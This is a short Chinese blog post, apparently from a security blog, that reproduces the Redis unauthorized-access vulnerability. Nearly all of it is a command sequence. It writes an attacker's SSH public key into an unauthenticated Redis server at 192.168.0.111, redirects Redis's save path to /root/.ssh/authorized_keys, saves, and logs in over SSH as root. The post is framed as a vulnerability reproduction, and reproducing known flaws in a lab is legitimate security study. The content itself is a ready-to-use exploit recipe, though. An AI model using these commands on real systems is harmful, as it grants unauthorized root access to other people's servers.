写入公钥
1. ssh-keygen -t rsa //执行生成key命令
2. (echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > 1.txt //将公钥写入txt
3. cat /root/.ssh/1.txt | ./redis-cli -h 192.168.0.111 -x set xxx //将.ssh目录下的公钥文件1.txt 通过redis-cli客户端写入到目标主机缓冲中
4. ./redis-cli -h 192.168.0.111 //使用客户端登录目标
config set dir /root/.ssh //设置存储公钥路径
config set dbfilename authorized_keys //设置文件名称
5. get xxx //查看缓存
save //保存缓存到目标主机路径及文件下
exit //退出
6. ssh 192.168.0.111 //成功登录
转载请注明:Adminxe's Blog » redis未授权漏洞复现-写入公钥利用